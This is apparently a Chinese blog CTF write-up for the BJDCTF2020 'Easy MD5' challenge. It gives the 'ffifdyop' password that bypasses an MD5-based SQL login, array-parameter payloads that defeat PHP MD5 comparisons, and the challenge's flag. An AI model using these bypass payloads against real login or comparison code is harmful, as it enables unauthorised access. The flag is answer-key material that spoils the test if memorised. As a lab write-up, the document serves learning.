0
点赞
收藏
分享

微信扫一扫

[BJDCTF2020]Easy MD5

兽怪海北 2022-03-20 阅读 33
web安全安全

3X02题目-[BJDCTF2020]Easy MD5

ffifdyop

存在MD5密码登录绕过的,ffifdyop万能密码
存在MD5弱类型比较的,可以用数组或者md5碰撞

在这里插入图片描述

之后转到levels91.php

查看源码发现一段php代码

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

存在MD5弱类型比较的,可以用数组或者md5碰撞

这里构造payload:./levels91.php?a[]=1&a[]=2

转到levell.php

并得到php代码

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

接着post:param1[]=1&param2[]=2

得到flag

flag{ab7744f3-727a-496a-b62c-0487617a48a0}

举报

相关推荐

[BJDCTF2020]Easy MD5 1

SQLWeb安全网络安全ctfPHPyyds干货盘点

[BJDCTF 2020]easy_md5

算法

NSS [BJDCTF 2020]easy_md5

leetcode游戏算法

BJDctf2020 Ezphp

php开发语言

[BJDCTF2020]----EzPHP

人机交互电脑嵌入式硬件信息与通信经验分享

[BJDCTF2020]EzPHP

phpsmartweb安全

BUUCTF:[BJDCTF2020]EasySearch

BUUCTFBJDCTF2020htmlbcphp代码人生

buu-[BJDCTF2020]JustRE

安全

[BJDCTF2020]BJD hamburger competition

c#网络安全

[BJDCTF2020]纳尼1

网络安全
0 条评论